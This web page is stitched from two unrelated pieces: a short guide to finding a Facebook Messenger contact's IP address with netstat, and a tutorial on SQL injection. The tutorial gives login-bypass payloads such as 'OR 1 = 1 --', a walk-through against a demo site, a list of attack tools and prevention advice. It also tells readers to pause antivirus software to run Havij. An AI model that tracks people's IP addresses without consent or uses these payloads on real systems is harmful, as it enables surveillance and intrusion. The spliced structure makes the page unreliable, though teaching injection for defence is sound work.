You will first need to establish a connection with the user. As this requires an open connection, the built-in Facebook messenger system is your best bet.

When you open a new chat window with the user and make sure they are online, keep the window open and then proceed to open the Utility Tool on Mac or Command Prompt on Windows. Next, type in ‘netstat -an’ and press Enter.

Provided that there is an active connection with the user, their IP address should appear after a short period of time. However, before you execute this command, make sure that you have closed any other browser sessions and windows, as the function can return other active IP addresses and thus hinder your effort

Enjoy! Follow us for more...

What is a SQL Injection? How SQL Injection Works ?

What is a SQL Injection?

SQL Injection is an attack that poisons dynamic SQL statements to comment out certain parts of the statement or appending a condition that will always be true. It takes advantage of the design flaws in poorly designed web applications to exploit SQL statements to execute malicious SQL code. In this tutorial, you will learn SQL Injection techniques and how you can protect web applications from such attacks.

How SQL Injection Works ?

The types of attacks that can be performed using SQL injection vary depending on the type of database engine. The attack works on dynamic SQL statements. A dynamic statement is a statement that is generated at run time using parameters password from a web form or URI query string.

Let’s consider a simple web application with a login form. The code for the HTML form is shown below.

<form action=‘index.php’ method="post">

<input type="email" name="email" required="required"/>

<input type="password" name="password"/>

<input type="checkbox" name="remember_me" value="Remember me"/>

<input type="submit" value="Submit"/>

</form>

HERE,

The above form accepts the email address, and password then submits them to a PHP file named index.php.
It has an option of storing the login session in a cookie. We have deduced this from the remember_me checkbox. It uses the post method to submit data. This means the values are not displayed in the URL.

Let’s suppose the statement at the backend for checking user ID is as follows

SELECT * FROM users WHERE email = $_POST['email'] AND password = md5($_POST['password']);

HERE,

The above statement uses the values of the $_POST[] array directly without sanitizing them.
The password is encrypted using MD5 algorithm.

We will illustrate SQL injection attack using sqlfiddle. Open the URL http://sqlfiddle.com/ in your web browser. You will get the following window.

Note: you will have to write the SQL statements

Step 1) Enter this code in left pane

CREATE TABLE `users` (
  `id` INT NOT NULL AUTO_INCREMENT,
  `email` VARCHAR(45) NULL,
  `password` VARCHAR(45) NULL,
  PRIMARY KEY (`id`));
  
  
insert into users (email,password) values ('m@m.com
 ',md5('abc'));

Step 2) Click Build Schema

Step 3) Enter this code in right pane

select * from users;

Step 4) Click Run SQL. You will see the following result

Suppose user supplies admin@admin.sys and 1234 as the password. The statement to be executed against the database would be

SELECT * FROM users WHERE email = 'admin@admin.sys' AND password = md5('1234');

The above code can be exploited by commenting out the password part and appending a condition that will always be true. Let’s suppose an attacker provides the following input in the email address field.

xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ]

xxx for the password.

The generated dynamic statement will be as follows.

SELECT * FROM users WHERE email = 'xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ] AND password = md5('1234');

HERE,

xxx@xxx.xxx ends with a single quote which completes the string quote
OR 1 = 1 LIMIT 1 is a condition that will always be true and limits the returned results to only one record.
-- ' AND … is a SQL comment that eliminates the password part.

Copy the above SQL statement and paste it in SQL FiddleRun SQL Text box as shown below

Hacking Activity: SQL Inject a Web Application

We have a simple web application at http://www.techpanda.org/ that is vulnerable to SQL Injection attacks for demonstration purposes only. The HTML form code above is taken from the login page. The application provides basic security such as sanitizing the email field. This means our above code cannot be used to bypass the login.

To get round that, we can instead exploit the password field. The diagram below shows the steps that you must follow

Let’s suppose an attacker provides the following input

Step 1: Enter xxx@xxx.xxx as the email address
Step 2: Enter xxx') OR 1 = 1 -- ]

Click on Submit button
You will be directed to the dashboard

The generated SQL statement will be as follows

SELECT * FROM users WHERE email = 'xxx@xxx.xxx' AND password = md5('xxx') OR 1 = 1 -- ]');

The diagram below illustrates the statement has been generated.

HERE,

The statement intelligently assumes md5 encryption is used
Completes the single quote and closing bracket
Appends a condition to the statement that will always be true

In general, a successful SQL Injection attack attempts a number of different techniques such as the ones demonstrated above to carry out a successful attack.

Other SQL Injection attack types

SQL Injections can do more harm than just by passing the login algorithms. Some of the attacks include

Deleting data
Updating data
Inserting data
Executing commands on the server that can download and install malicious programs such as Trojans
Exporting valuable data such as credit card details, email, and passwords to the attacker’s remote server
Getting user login details etc

The above list is not exhaustive; it just gives you an idea of what SQL Injection

Automation Tools for SQL Injection

In the above example, we used manual attack techniques based on our vast knowledge of SQL. There are automated tools that can help you perform the attacks more efficiently and within the shortest possible time. These tools include

SQLSmack - http://www.securiteam.com/tools/5GP081P75C.html
SQLPing 2 - http://www.sqlsecurity.com/downloads/sqlping2.zip?attredirects=0&d=1
SQLMap - http://sqlmap.org/

How to Prevent against SQL Injection Attacks

An organization can adopt the following policy to protect itself against SQL Injection attacks.

User input should never be trusted - It must always be sanitized before it is used in dynamic SQL statements.
Stored procedures – these can encapsulate the SQL statements and treat all input as parameters.
Prepared statements –prepared statements to work by creating the SQL statement first then treating all submitted user data as parameters. This has no effect on the syntax of the SQL statement.
Regular expressions –these can be used to detect potential harmful code and remove it before executing the SQL statements.
Database connection user access rights –only necessary access rights should be given to accounts used to connect to the database. This can help reduce what the SQL statements can perform on the server.
Error messages –these should not reveal sensitive information and where exactly an error occurred. Simple custom error messages such as “Sorry, we are experiencing technical errors. The technical team has been contacted. Please try again later” can be used instead of display the SQL statements that caused the error.

Hacking Activity: Use Havij for SQL Injection

In this practical scenario, we are going to use Havij Advanced SQL Injection program to scan a website for vulnerabilities.

Note: your anti-virus program may flag it due to its nature. You should add it to the exclusions list or pause your anti-virus software.

The image below shows the main window for Havij

The above tool can be used to assess the vulnerability of a web site/application.

Summary

SQL Injection is an attack type that exploits bad SQL statements
SQL injection can be used to bypass login algorithms, retrieve, insert, and update and delete data.
SQL injection tools include SQLMap, SQLPing, and SQLSmack, etc.
A good security policy when writing SQL statement can help reduce SQL injection attacks.